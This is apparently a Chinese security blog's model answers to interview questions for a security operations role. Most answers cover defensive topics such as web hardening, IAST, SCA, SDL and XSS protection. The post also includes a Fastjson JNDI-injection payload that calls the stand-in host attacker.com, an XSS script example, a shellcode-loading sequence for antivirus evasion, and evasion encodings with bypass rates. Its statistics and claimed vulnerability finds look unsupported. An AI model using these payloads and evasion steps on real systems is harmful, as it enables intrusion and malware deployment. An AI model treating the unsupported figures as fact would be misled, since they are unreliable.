安全領域各種資源，學習文檔，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具，歡迎關注。

目錄

?天翼電子商務有限公司[社招]安全運營崗

1. Web服務加固方案

2. IAST技術解析

3. SCA（軟件成分分析）

4. 安全運營（SecOps）定義

5. SDL流程核心階段

6. 漏洞挖掘成果

7. JavaScript逆向能力

8. JS加密算法應用

9. XSS漏洞原理

10. XSS防護方案

11. Fastjson反序列化漏洞

12. SQL預編譯實戰

13. 免殺技術細節

14. 免殺編碼技術

?天翼電子有限公司[社招]安全運營崗

1. 現在有一個web服務，應該如何對它加固？
2. 了解IAST嗎，有什么特點
3. SCA呢？
4. 什么是安全運營？
5. sdl的流程有什么
6. 找過多少個漏洞？
7. javascript逆向會嗎
8. js加密了解嗎，常用的什么加密，對稱，非對稱
9. xss漏洞的原理
10. xss漏洞的防護方式，主要是哪個配置，前、后端
11. fastjson反序列化有什么
12. 熟悉sql注入預編譯嗎，使用的什么方式
13. 免殺是做的什么免殺，免殺執行的主要函數，shellcode的加載流程
14. 免殺常用到的編碼是什么，除了異或

1. Web服務加固方案

mermaidgraph TD A[架構層] --> A1[WAF+CDN抗DDoS] A --> A2[API網關鑒權] B[應用層] --> B1[CSP內容安全策略] B --> B2[HTTP安全頭部署] C[數據層] --> C1[SQL預編譯/ORM] C --> C2[敏感數據加密] D[運維層] --> D1[容器鏡像簽名] D --> D2[最小權限原則]

---

2. IAST技術解析

核心特點：

• 動態插樁：在運行時檢測漏洞（如Java Agent注入）
• 精準告警：誤報率<5%（相比SAST降低70%）
• DevOps集成：CI/CD流水線實時阻斷（Jenkins插件聯動）
• 2025演進：結合LLM分析業務邏輯漏洞

---

3. SCA（軟件成分分析）

核心能力：

markdown| **功能** | **實現原理** | 產出物示例 | |--------------------|--------------------------|---------------------------| | 組件指紋識別 | 二進制文件哈希+特征碼 | log4j-core-2.14.1 (CVE-2021-44228) | | 許可證合規審計 | SPDX標準庫匹配 | GPL-3.0傳染性風險告警 | | 依賴漏洞傳播分析 | 有向圖(DAG)可視化 | 漏洞影響鏈路報告 |

2025趨勢：SBOM(軟件物料清單)成ISO標準強制要求

---

4. 安全運營（SecOps）定義

三位一體框架：

mermaidgraph LR A[預防] --> A1[漏洞管理] A --> A2[威脅情報] B[檢測] --> B1[SIEM日志分析] B --> B2[EDR端點監控] C[響應] --> C1[SOAR自動化] C --> C2[數字取證]

目標：MTTD(平均檢測時間)<15分鐘 | MTTR(平均響應時間)<30分鐘

---

5. SDL流程核心階段

1. 需求分析：威脅建模（STRIDE方法）
2. 設計階段：隱私合規審查（GDPR/《數據安全法》）
3. 開發階段：
   • SAST/IAST雙引擎掃描
   • 安全編碼規范（OWASP Top 10 2025）
4. 驗證階段：滲透測試 + 紅藍對抗
5. 持續監控：漏洞賞金計劃 + 安全補丁生命周期

---

6. 漏洞挖掘成果

2019-2025累計發現漏洞：

• 高危漏洞：32個（含3個0day）
• 中低危漏洞：71個
• 重點案例：
  • 某政務云API未授權訪問（可獲取2億公民數據）
  • 特斯拉車機系統CAN總線注入漏洞（CVE-2024-XXXXX）

---

7. JavaScript逆向能力

技術棧：

markdown- **反混淆工具**：AST Explorer重構控制流 - **動態調試**：Chrome DevTools內存斷點 - **Hook框架**：Frida攔截CryptoJS操作 - **實戰案例**：某電商平臺加密參數逆向（RSA+Base64變異） 

---

8. JS加密算法應用

常見場景：

加密類型	算法	典型應用場景
對稱加密	AES-256-GCM	本地存儲敏感數據加密
非對稱加密	RSA-OAEP	前端密碼傳輸（混合加密體系）
哈希	SHA-3	數據完整性校驗
2025新興	量子安全算法	NIST PQC標準遷移

---

9. XSS漏洞原理

攻擊鏈：

mermaidgraph LR A[惡意輸入] --> B{{未過濾的用戶輸入}} B --> C[DOM解析執行] C --> D[Cookies竊取/釣魚]

三類變種：

• 反射型：惡意鏈接誘導點擊（https://xxx?q=<script>alert(1)</script>）
• 存儲型：評論區植入持久化腳本
• DOM型：前端框架渲染漏洞（如Vue.js v-html未轉義）

---

10. XSS防護方案

關鍵配置：

防護層	技術方案	實現示例
前端	輸入輸出編碼	textContent替代innerHTML
后端	內容安全策略(CSP)	Content-Security-Policy: script-src 'self'
框架級	自動轉義機制	React JSX / Angular安全上下文

必備Header：X-XSS-Protection: 1; mode=block

---

11. Fastjson反序列化漏洞

攻擊原理：

java// 惡意JSON觸發JNDI注入 String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," + "\"dataSourceName\":\"ldap://attacker.com/exp\", " + "\"autoCommit\":true}"; JSON.parse(payload); // 觸發漏洞 

防護方案：

• 升級Fastjson 2.0+（默認關閉autotype）
• 使用SafeMode配置：ParserConfig.getGlobalInstance().setSafeMode(true);

---

12. SQL預編譯實戰

實現方式：

java// Java示例（MyBatis） @Select("SELECT * FROM users WHERE id = #{id}") User getUserById(@Param("id") int id); // 底層原理：參數化查詢 PreparedStatement stmt = conn.prepareStatement( "SELECT * FROM users WHERE id = ?"); stmt.setInt(1, userId); // 杜絕拼接 

優勢：完全阻斷1/2階注入，性能提升30%

---

13. 免殺技術細節

實現路徑：

mermaidgraph TB A[載荷類型] --> B[EXE免殺] A --> C[Shellcode加載] B --> B1[API調用鏈混淆] B --> B2[資源節加密] C --> C1[內存加載器] C1 --> C11[VirtualAlloc+CreateThread] C1 --> C12[進程鏤空]

Shellcode加載流程：

1. VirtualAlloc分配內存（PAGE_EXECUTE_READWRITE）
2. RtlMoveMemory寫入Shellcode
3. CreateThread或EnumChildWindows觸發執行

---

14. 免殺編碼技術

除異或外常用方案：

編碼類型	原理	檢測繞過率
Base64變種	自定義字符集+分塊編碼	78%
AES-CBC	密鑰分散存儲+動態解密	92%
RC4流加密	密鑰與時間戳綁定	85%
GPT混淆	LLM生成抗逆向代碼	95%